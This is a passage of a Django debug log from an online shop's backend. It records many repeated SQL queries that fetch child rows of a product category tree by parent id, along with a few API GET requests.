"shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-16 07:37:42,451 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-16 07:37:42,454 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-16 07:37:42,457 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-16 07:37:42,457 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-16 07:37:42,465 utils 20136 140506432534272 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-16 07:37:42,471 utils 20136 140506422044416 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-16 07:37:42,473 utils 20136 140506432534272 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-16 07:37:42,477 utils 20136 140506422044416 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-16 07:37:42,479 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-16 07:37:42,481 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-16 07:37:42,483 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-16 07:37:42,485 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-16 07:37:42,487 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-16 07:37:42,488 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-16 07:37:42,493 utils 20136 140506432534272 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-16 07:37:42,496 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-16 07:37:42,498 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-16 07:37:42,500 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-16 07:37:42,502 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-16 07:37:42,504 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-16 07:37:42,504 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-16 07:37:42,509 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-16 07:37:42,511 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-16 07:37:42,513 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-16 07:37:42,516 utils 20136 140506432534272 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-16 07:37:42,520 utils 20136 140506422044416 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-16 07:37:42,522 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-16 07:37:42,524 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-16 07:37:42,526 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-16 07:37:42,529 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-16 07:37:42,531 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-16 07:37:42,533 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-16 07:37:42,535 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-16 07:37:42,538 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-16 07:37:42,540 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-16 07:37:42,540 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-16 07:37:42,548 utils 20136 140506432534272 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-16 07:37:42,550 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-16 07:37:42,554 utils 20136 140506432534272 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-16 07:37:42,556 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-16 07:37:42,558 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-16 07:37:42,561 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-16 07:37:42,565 utils 20136 140506432534272 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-16 07:37:42,568 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-16 07:37:42,571 utils 20136 140506432534272 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-16 07:37:42,573 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) DEBUG 2019-12-16 07:37:42,574 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [16/Dec/2019 07:37:42] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [16/Dec/2019 07:37:42] "GET /api/v1/categories/big-fire HTTP/1.0" 200 15396 DEBUG 2019-12-16 07:38:25,747 utils 20136 140506432534272 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-16 07:38:25,753 utils 20136 140506422044416 (0.008) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-16 07:38:25,760 utils 20136 140506432534272 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-16 07:38:25,764 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-16 07:38:25,767 utils 20136 140506432534272 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-16 07:38:25,771 utils 20136 140506422044416 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-16 07:38:25,773 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-16 07:38:25,776 utils 20136 140506422044416 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-16 07:38:25,779 utils 20136 140506432534272 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-16 07:38:25,781 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-16 07:38:25,783 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-16 07:38:25,785 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-16 07:38:25,787 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-16 07:38:25,789 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-16 07:38:25,791 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-16 07:38:25,793 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-16 07:38:25,795 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 07:38:25,798 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 07:38:25,801 utils 20136 140506432534272 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-16 07:38:25,803 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", 